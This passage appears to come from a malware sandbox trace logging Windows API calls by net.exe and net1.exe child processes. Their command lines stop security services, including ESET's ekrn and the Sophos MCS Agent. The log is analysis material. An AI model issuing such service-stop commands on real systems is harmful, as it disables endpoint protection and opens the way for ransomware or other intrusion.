lpNumberOfBytesWritten=0x20f770, lpOverlapped=0x0) returned 0 [0217.536] LocalFree (hMem=0x406278) returned 0x0 [0217.537] NetApiBufferFree (Buffer=0x401c50) returned 0x0 [0217.537] NetApiBufferFree (Buffer=0x401c68) returned 0x0 [0217.537] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop ekrn /y" [0217.537] exit (_Code=2) Process: id = "368" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x52a5c000" os_pid = "0xbdc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop MMS /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 543 os_tid = 0xbbc Process: id = "369" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x5dd22000" os_pid = "0xbcc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "368" os_parent_pid = "0xbdc" cmd_line = "C:\\Windows\\system32\\net1 stop MMS /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 544 os_tid = 0xbac [0217.679] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x23fa14 | out: lpSystemTimeAsFileTime=0x23fa14*(dwLowDateTime=0x4aef7b80, dwHighDateTime=0x1d57a87)) [0217.679] GetCurrentProcessId () returned 0xbcc [0217.679] GetCurrentThreadId () returned 0xbac [0217.679] GetTickCount () returned 0x116ff65 [0217.679] QueryPerformanceCounter (in: lpPerformanceCount=0x23fa0c | out: lpPerformanceCount=0x23fa0c*=33796398487) returned 1 [0217.680] GetModuleHandleA (lpModuleName=0x0) returned 0x40000 [0217.680] __set_app_type (_Type=0x1) [0217.680] __p__fmode () returned 0x74eb31f4 [0217.680] __p__commode () returned 0x74eb31fc [0217.680] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4ffe6) returned 0x0 [0217.680] __getmainargs (in: _Argc=0x59064, _Argv=0x5906c, _Env=0x59068, _DoWildCard=0, _StartInfo=0x59024 | out: _Argc=0x59064, _Argv=0x5906c, _Env=0x59068) returned 0 [0217.680] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0217.680] GetConsoleOutputCP () returned 0x1b5 [0217.680] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x59080 | out: lpCPInfo=0x59080) returned 1 [0217.680] SetThreadUILanguage (LangId=0x0) returned 0x409 [0217.684] sprintf_s (in: _DstBuf=0x23f9cc, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0217.684] setlocale (category=0, locale=".437") returned="English_United States.437" [0217.686] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0217.686] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0217.686] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MMS /y" [0217.686] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x23f798, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0217.686] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x5a) returned 0x6b3bf0 [0217.686] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0217.687] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x23f99c | out: Buffer=0x23f99c*=0x6b1c50) returned 0x0 [0217.687] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x23f99c | out: Buffer=0x23f99c*=0x6b1c68) returned 0x0 [0217.687] _fileno (_File=0x74eb2900) returned -2 [0217.687] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0217.687] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0217.687] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0217.687] _wcsicmp (_String1="config", _String2="stop") returned -16 [0217.687] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0217.687] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0217.687] _wcsicmp (_String1="file", _String2="stop") returned -13 [0217.687] _wcsicmp (_String1="files", _String2="stop") returned -13 [0217.687] _wcsicmp (_String1="group", _String2="stop") returned -12 [0217.687] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0217.687] _wcsicmp (_String1="help", _String2="stop") returned -11 [0217.687] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0217.687] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0217.687] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0217.687] _wcsicmp (_String1="session", _String2="stop") returned -15 [0217.687] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0217.687] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0217.687] _wcsicmp (_String1="share", _String2="stop") returned -12 [0217.687] _wcsicmp (_String1="start", _String2="stop") returned -14 [0217.687] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0217.687] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0217.687] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0217.687] _wcsicmp (_String1="accounts", _String2="MMS") returned -12 [0217.687] _wcsicmp (_String1="computer", _String2="MMS") returned -10 [0217.687] _wcsicmp (_String1="config", _String2="MMS") returned -10 [0217.687] _wcsicmp (_String1="continue", _String2="MMS") returned -10 [0217.687] _wcsicmp (_String1="cont", _String2="MMS") returned -10 [0217.688] _wcsicmp (_String1="file", _String2="MMS") returned -7 [0217.688] _wcsicmp (_String1="files", _String2="MMS") returned -7 [0217.688] _wcsicmp (_String1="group", _String2="MMS") returned -6 [0217.688] _wcsicmp (_String1="groups", _String2="MMS") returned -6 [0217.688] _wcsicmp (_String1="help", _String2="MMS") returned -5 [0217.688] _wcsicmp (_String1="helpmsg", _String2="MMS") returned -5 [0217.688] _wcsicmp (_String1="localgroup", _String2="MMS") returned -1 [0217.688] _wcsicmp (_String1="pause", _String2="MMS") returned 3 [0217.688] _wcsicmp (_String1="session", _String2="MMS") returned 6 [0217.688] _wcsicmp (_String1="sessions", _String2="MMS") returned 6 [0217.688] _wcsicmp (_String1="sess", _String2="MMS") returned 6 [0217.688] _wcsicmp (_String1="share", _String2="MMS") returned 6 [0217.688] _wcsicmp (_String1="start", _String2="MMS") returned 6 [0217.688] _wcsicmp (_String1="stats", _String2="MMS") returned 6 [0217.688] _wcsicmp (_String1="statistics", _String2="MMS") returned 6 [0217.688] _wcsicmp (_String1="stop", _String2="MMS") returned 6 [0217.688] _wcsicmp (_String1="time", _String2="MMS") returned 7 [0217.688] _wcsicmp (_String1="user", _String2="MMS") returned 8 [0217.688] _wcsicmp (_String1="users", _String2="MMS") returned 8 [0217.688] _wcsicmp (_String1="msg", _String2="MMS") returned 6 [0217.688] _wcsicmp (_String1="messenger", _String2="MMS") returned -8 [0217.688] _wcsicmp (_String1="receiver", _String2="MMS") returned 5 [0217.688] _wcsicmp (_String1="rcv", _String2="MMS") returned 5 [0217.688] _wcsicmp (_String1="netpopup", _String2="MMS") returned 1 [0217.688] _wcsicmp (_String1="redirector", _String2="MMS") returned 5 [0217.688] _wcsicmp (_String1="redir", _String2="MMS") returned 5 [0217.688] _wcsicmp (_String1="rdr", _String2="MMS") returned 5 [0217.688] _wcsicmp (_String1="workstation", _String2="MMS") returned 10 [0217.688] _wcsicmp (_String1="work", _String2="MMS") returned 10 [0217.688] _wcsicmp (_String1="wksta", _String2="MMS") returned 10 [0217.688] _wcsicmp (_String1="prdr", _String2="MMS") returned 3 [0217.688] _wcsicmp (_String1="devrdr", _String2="MMS") returned -9 [0217.688] _wcsicmp (_String1="lanmanworkstation", _String2="MMS") returned -1 [0217.688] _wcsicmp (_String1="server", _String2="MMS") returned 6 [0217.688] _wcsicmp (_String1="svr", _String2="MMS") returned 6 [0217.688] _wcsicmp (_String1="srv", _String2="MMS") returned 6 [0217.688] _wcsicmp (_String1="lanmanserver", _String2="MMS") returned -1 [0217.689] _wcsicmp (_String1="alerter", _String2="MMS") returned -12 [0217.689] _wcsicmp (_String1="netlogon", _String2="MMS") returned 1 [0217.689] _wcsupr (in: _String="MMS" | out: _String="MMS") returned="MMS" [0217.689] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x6b54a0 [0217.691] GetServiceKeyNameW (in: hSCManager=0x6b54a0, lpDisplayName="MMS", lpServiceName=0x5aaf0, lpcchBuffer=0x23f938 | out: lpServiceName="", lpcchBuffer=0x23f938) returned 0 [0217.692] _wcsicmp (_String1="msg", _String2="MMS") returned 6 [0217.692] _wcsicmp (_String1="messenger", _String2="MMS") returned -8 [0217.692] _wcsicmp (_String1="receiver", _String2="MMS") returned 5 [0217.692] _wcsicmp (_String1="rcv", _String2="MMS") returned 5 [0217.692] _wcsicmp (_String1="redirector", _String2="MMS") returned 5 [0217.692] _wcsicmp (_String1="redir", _String2="MMS") returned 5 [0217.692] _wcsicmp (_String1="rdr", _String2="MMS") returned 5 [0217.692] _wcsicmp (_String1="workstation", _String2="MMS") returned 10 [0217.692] _wcsicmp (_String1="work", _String2="MMS") returned 10 [0217.692] _wcsicmp (_String1="wksta", _String2="MMS") returned 10 [0217.692] _wcsicmp (_String1="prdr", _String2="MMS") returned 3 [0217.692] _wcsicmp (_String1="devrdr", _String2="MMS") returned -9 [0217.692] _wcsicmp (_String1="lanmanworkstation", _String2="MMS") returned -1 [0217.692] _wcsicmp (_String1="server", _String2="MMS") returned 6 [0217.692] _wcsicmp (_String1="svr", _String2="MMS") returned 6 [0217.692] _wcsicmp (_String1="srv", _String2="MMS") returned 6 [0217.692] _wcsicmp (_String1="lanmanserver", _String2="MMS") returned -1 [0217.692] _wcsicmp (_String1="alerter", _String2="MMS") returned -12 [0217.692] _wcsicmp (_String1="netlogon", _String2="MMS") returned 1 [0217.692] NetServiceControl (in: servername=0x0, service="MMS", opcode=0x0, arg=0x0, bufptr=0x23f934 | out: bufptr=0x23f934) returned 0x889 [0217.693] wcscpy_s (in: _Destination=0x5a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0217.693] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a80000 [0217.694] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a80000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x5b338, nSize=0x800, Arguments=0x59dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0217.695] GetFileType (hFile=0x26c) returned 0x3 [0217.695] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x6b3fd0 [0217.695] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x6b3fd0, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0217.695] WriteFile (in: hFile=0x26c, lpBuffer=0x6b3fd0, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x23f874, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x23f874, lpOverlapped=0x0) returned 0 [0217.695] LocalFree (hMem=0x6b3fd0) returned 0x0 [0217.695] GetFileType (hFile=0x26c) returned 0x3 [0217.695] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x6b6278 [0217.695] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x6b6278, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nk", lpUsedDefaultChar=0x0) returned 2 [0217.696] WriteFile (in: hFile=0x26c, lpBuffer=0x6b6278, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x23f874, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x23f874, lpOverlapped=0x0) returned 0 [0217.696] LocalFree (hMem=0x6b6278) returned 0x0 [0217.696] _ultow (in: _Dest=0x889, _Radix=2357412 | out: _Dest=0x889) returned="2185" [0217.696] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a80000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x5b338, nSize=0x800, Arguments=0x59dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0217.696] GetFileType (hFile=0x26c) returned 0x3 [0217.696] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x6b6278 [0217.696] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x6b6278, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0217.696] WriteFile (in: hFile=0x26c, lpBuffer=0x6b6278, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x23f880, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x23f880, lpOverlapped=0x0) returned 0 [0217.696] LocalFree (hMem=0x6b6278) returned 0x0 [0217.696] GetFileType (hFile=0x26c) returned 0x3 [0217.696] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x6b6278 [0217.696] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x6b6278, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nk", lpUsedDefaultChar=0x0) returned 2 [0217.696] WriteFile (in: hFile=0x26c, lpBuffer=0x6b6278, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x23f880, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x23f880, lpOverlapped=0x0) returned 0 [0217.696] LocalFree (hMem=0x6b6278) returned 0x0 [0217.697] NetApiBufferFree (Buffer=0x6b1c50) returned 0x0 [0217.697] NetApiBufferFree (Buffer=0x6b1c68) returned 0x0 [0217.697] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MMS /y" [0217.697] exit (_Code=2) Process: id = "370" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x55161000" os_pid = "0x5c8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop ΓÇ£Sophos MCS AgentΓÇ¥ /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 545 os_tid = 0x808 Process: id = "371" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x5e5a0000" os_pid = "0xbfc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "370" os_parent_pid = "0x5c8" cmd_line = "C:\\Windows\\system32\\net1 stop ΓÇ£Sophos MCS AgentΓÇ¥ /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 546 os_tid = 0xbec [0217.832] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cf804 | out: lpSystemTimeAsFileTime=0x1cf804*(dwLowDateTime=0x4b074940, dwHighDateTime=0x1d57a87)) [0217.832] GetCurrentProcessId () returned 0xbfc [0217.832] GetCurrentThreadId () returned 0xbec [0217.832] GetTickCount () returned 0x1170001 [0217.832] QueryPerformanceCounter (in: lpPerformanceCount=0x1cf7fc | out: lpPerformanceCount=0x1cf7fc*=33811680671) returned 1 [0217.832] GetModuleHandleA (lpModuleName=0x0) returned 0x9d0000 [0217.832] __set_app_type (_Type=0x1) [0217.832] __p__fmode () returned 0x74eb31f4 [0217.833] __p__commode () returned 0x74eb31fc [0217.833] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x9dffe6) returned 0x0 [0217.833] __getmainargs (in: _Argc=0x9e9064, _Argv=0x9e906c, _Env=0x9e9068, _DoWildCard=0, _StartInfo=0x9e9024 | out: _Argc=0x9e9064, _Argv=0x9e906c, _Env=0x9e9068) returned 0 [0217.833] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0217.833] GetConsoleOutputCP () returned 0x1b5 [0217.833] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x9e9080 | out: lpCPInfo=0x9e9080) returned 1 [0217.833] SetThreadUILanguage (LangId=0x0) returned 0x409 [0217.836] sprintf_s (in: _DstBuf=0x1cf7bc, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0217.836] setlocale (category=0, locale=".437") returned="English_United States.437" [0217.838] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0217.838] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0217.838] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop ΓÇ£Sophos MCS AgentΓÇ¥ /y" [0217.838] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1cf588, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0217.838] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x88) returned 0x604bf8 [0217.839] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0217.839] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x1cf78c | out: Buffer=0x1cf78c*=0x601c90) returned 0x0 [0217.839] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x1cf78c | out: Buffer=0x1cf78c*=0x601ca8) returned 0x0 [0217.839] _fileno (_File=0x74eb2900) returned -2 [0217.839] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0217.839] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0217.839] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0217.839] _wcsicmp (_String1="config", _String2="stop") returned -16 [0217.839] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0217.839] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0217.839] _wcsicmp (_String1="file", _String2="stop") returned -13 [0217.839] _wcsicmp (_String1="files", _String2="stop") returned -13 [0217.839] _wcsicmp (_String1="group", _String2="stop") returned -12 [0217.839] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0217.839] _wcsicmp (_String1="help", _String2="stop") returned -11 [0217.839] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0217.839] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0217.839] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0217.839] _wcsicmp (_String1="session", _String2="stop") returned -15 [0217.839] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0217.839] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0217.839] _wcsicmp (_String1="share", _String2="stop") returned -12 [0217.840] _wcsicmp (_String1="start", _String2="stop") returned -14 [0217.840] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0217.840] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0217.840] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0217.840] _wcsicmp (_String1="accounts", _String2="ΓÇ£Sophos") returned -850 [0217.840] _wcsicmp (_String1="computer", _String2="ΓÇ£Sophos") returned -848 [0217.840] _wcsicmp (_String1="config", _String2="ΓÇ£Sophos") returned -848 [0217.840] _wcsicmp (_String1="continue", _String2="ΓÇ£Sophos") returned -848 [0217.840] _wcsicmp (_String1="cont", _String2="ΓÇ£Sophos") returned -848 [0217.840] _wcsicmp (_String1="file", _String2="ΓÇ£Sophos") returned -845 [0217.840] _wcsicmp (_String1="files", _String2="ΓÇ£Sophos") returned -845 [0217.840] _wcsicmp (_String1="group", _String2="ΓÇ£Sophos") returned -844 [0217.840] _wcsicmp (_String1="groups", _String2="ΓÇ£Sophos") returned -844 [0217.840] _wcsicmp (_String1="help", _String2="ΓÇ£Sophos") returned -843 [0217.840] _wcsicmp (_String1="helpmsg", _String2="ΓÇ£Sophos") returned -843 [0217.840] _wcsicmp (_String1="localgroup", _String2="ΓÇ£Sophos") returned -839 [0217.840] _wcsicmp (_String1="pause", _String2="ΓÇ£Sophos") returned -835 [0217.840] _wcsicmp (_String1="session", _String2="ΓÇ£Sophos") returned -832 [0217.840] _wcsicmp (_String1="sessions", _String2="ΓÇ£Sophos") returned -832 [0217.840] _wcsicmp (_String1="sess", _String2="ΓÇ£Sophos") returned -832 [0217.840] _wcsicmp (_String1="share", _String2="ΓÇ£Sophos") returned -832 [0217.840] _wcsicmp (_String1="start", _String2="ΓÇ£Sophos") returned -832 [0217.840] _wcsicmp (_String1="stats", _String2="ΓÇ£Sophos") returned -832 [0217.840] _wcsicmp (_String1="statistics", _String2="ΓÇ£Sophos") returned -832 [0217.840] _wcsicmp (_String1="stop", _String2="ΓÇ£Sophos") returned -832 [0217.840] _wcsicmp (_String1="time", _String2="ΓÇ£Sophos") returned -831 [0217.840] _wcsicmp (_String1="user", _String2="ΓÇ£Sophos") returned -830 [0217.840] _wcsicmp (_String1="users", _String2="ΓÇ£Sophos") returned -830 [0217.840] _wcsicmp (_String1="msg", _String2="ΓÇ£Sophos") returned -838 [0217.840] _wcsicmp (_String1="messenger", _String2="ΓÇ£Sophos") returned -838 [0217.840] _wcsicmp (_String1="receiver", _String2="ΓÇ£Sophos") returned -833 [0217.840] _wcsicmp (_String1="rcv", _String2="ΓÇ£Sophos") returned -833 [0217.840] _wcsicmp (_String1="netpopup", _String2="ΓÇ£Sophos") returned -837 [0217.841] _wcsicmp (_String1="redirector", _String2="ΓÇ£Sophos") returned -833 [0217.841] _wcsicmp (_String1="redir", _String2="ΓÇ£Sophos") returned -833 [0217.841] _wcsicmp (_String1="rdr", _String2="ΓÇ£Sophos") returned -833 [0217.841] _wcsicmp (_String1="workstation", _String2="ΓÇ£Sophos") returned -828 [0217.841] _wcsicmp (_String1="work", _String2="ΓÇ£Sophos") returned -828 [0217.841] _wcsicmp (_String1="wksta", _String2="ΓÇ£Sophos") returned -828 [0217.841] _wcsicmp (_String1="prdr", _String2="ΓÇ£Sophos") returned -835 [0217.841] _wcsicmp (_String1="devrdr", _String2="ΓÇ£Sophos") returned -847 [0217.841] _wcsicmp (_String1="lanmanworkstation", _String2="ΓÇ£Sophos") returned -839 [0217.841] _wcsicmp (_String1="server", _String2="ΓÇ£Sophos") returned -832 [0217.841] _wcsicmp (_String1="svr", _String2="ΓÇ£Sophos") returned -832 [0217.841] _wcsicmp (_String1="srv", _String2="ΓÇ£Sophos") returned -832 [0217.841] _wcsicmp (_String1="lanmanserver", _String2="ΓÇ£Sophos") returned -839 [0217.841] _wcsicmp (_String1="alerter", _String2="ΓÇ£Sophos") returned -850 [0217.841] _wcsicmp (_String1="netlogon", _String2="ΓÇ£Sophos") returned -837 [0217.841] _wcsicmp (_String1="accounts", _String2="MCS") returned -12 [0217.841] _wcsicmp (_String1="computer", _String2="MCS") returned -10 [0217.841] _wcsicmp (_String1="config", _String2="MCS") returned -10 [0217.841] _wcsicmp (_String1="continue", _String2="MCS") returned -10 [0217.841] _wcsicmp (_String1="cont", _String2="MCS") returned -10 [0217.841] _wcsicmp (_String1="file", _String2="MCS") returned -7 [0217.841] _wcsicmp (_String1="files", _String2="MCS") returned -7 [0217.841] _wcsicmp (_String1="group", _String2="MCS") returned -6 [0217.841] _wcsicmp (_String1="groups", _String2="MCS") returned -6 [0217.841] _wcsicmp (_String1="help", _String2="MCS") returned -5 [0217.841] _wcsicmp (_String1="helpmsg", _String2="MCS") returned -5 [0217.841] _wcsicmp (_String1="localgroup", _String2="MCS") returned -1 [0217.841] _wcsicmp (_String1="pause", _String2="MCS") returned 3 [0217.841] _wcsicmp (_String1="session", _String2="MCS") returned 6 [0217.841] _wcsicmp (_String1="sessions", _String2="MCS") returned 6 [0217.841] _wcsicmp (_String1="sess", _String2="MCS") returned 6 [0217.842] _wcsicmp (_String1="share", _String2="MCS") returned 6 [0217.842] _wcsicmp (_String1="start", _String2="MCS") returned 6 [0217.842] _wcsicmp (_String1="stats", _String2="MCS") returned 6 [0217.842] _wcsicmp (_String1="statistics", _String2="MCS") returned 6 [0217.842] _wcsicmp (_String1="stop", _String2="MCS") returned 6 [0217.842] _wcsicmp (_String1="time", _String2="MCS") returned 7 [0217.842] _wcsicmp (_String1="user", _String2="MCS") returned 8 [0217.842] _wcsicmp (_String1="users", _String2="MCS") returned 8 [0217.842] _wcsicmp (_String1="msg", _String2="MCS") returned 16 [0217.842] _wcsicmp (_String1="messenger", _String2="MCS") returned 2 [0217.842] _wcsicmp (_String1="receiver", _String2="MCS") returned 5 [0217.842] _wcsicmp (_String1="rcv", _String2="MCS") returned 5 [0217.842] _wcsicmp (_String1="netpopup", _String2="MCS") returned 1 [0217.842] _wcsicmp (_String1="redirector", _String2="MCS") returned 5 [0217.842] _wcsicmp (_String1="redir", _String2="MCS") returned 5 [0217.842] _wcsicmp (_String1="rdr", _String2="MCS") returned 5 [0217.842] _wcsicmp (_String1="workstation", _String2="MCS") returned 10 [0217.842] _wcsicmp (_String1="work", _String2="MCS") returned 10 [0217.842] _wcsicmp (_String1="wksta", _String2="MCS") returned 10 [0217.842] _wcsicmp (_String1="prdr", _String2="MCS") returned 3 [0217.842] _wcsicmp (_String1="devrdr", _String2="MCS") returned -9 [0217.842] _wcsicmp (_String1="lanmanworkstation", _String2="MCS") returned -1 [0217.842] _wcsicmp (_String1="server", _String2="MCS") returned 6 [0217.842] _wcsicmp (_String1="svr", _String2="MCS") returned 6 [0217.842] _wcsicmp (_String1="srv", _String2="MCS") returned 6 [0217.842] _wcsicmp (_String1="lanmanserver", _String2="MCS") returned -1 [0217.842] _wcsicmp (_String1="alerter", _String2="MCS") returned -12 [0217.842] _wcsicmp (_String1="netlogon", _String2="MCS") returned 1 [0217.842] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0217.842] SetThreadUILanguage (LangId=0x0) returned 0x409 [0217.843] wcscpy_s (in: _Destination=0x1cf28c, _SizeInWords=0xf, _Source="neth.dll" | out: _Destination="neth.dll") returned 0x0 [0217.843] LoadLibraryW (lpLibFileName="neth.dll") returned 0x74a10000 [0217.843] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc66, dwLanguageId=0x0, lpBuffer=0x1cf288, nSize=0x0, Arguments=0x1cf284 | out: lpBuffer="叐`neth.dll") returned 0xff [0217.845] wcstok (in: _String="CONTINUE: CONT$\r\nFILE: FILES$\r\nGROUP: GROUPS$\r\nREPLICATOR: REPL, REPLICATOR$\r\nSESSION: SESSIONS, SESS$\r\nSTATISTICS: STATS$\r\nUSER: USERS$\r\nWORKSTATION: REDIRECTOR, REDIR, RDR, WORK, WKSTA, PRDR, DEVRDR$\r\nSERVER: SVR, SRV$\r\n", _Delimiter="$", _Context=0x3d6 | out: _String="CONTINUE: CONT", _Context=0x3d6) returned="CONTINUE: CONT" [0217.845] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nFILE: FILES" [0217.845] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) 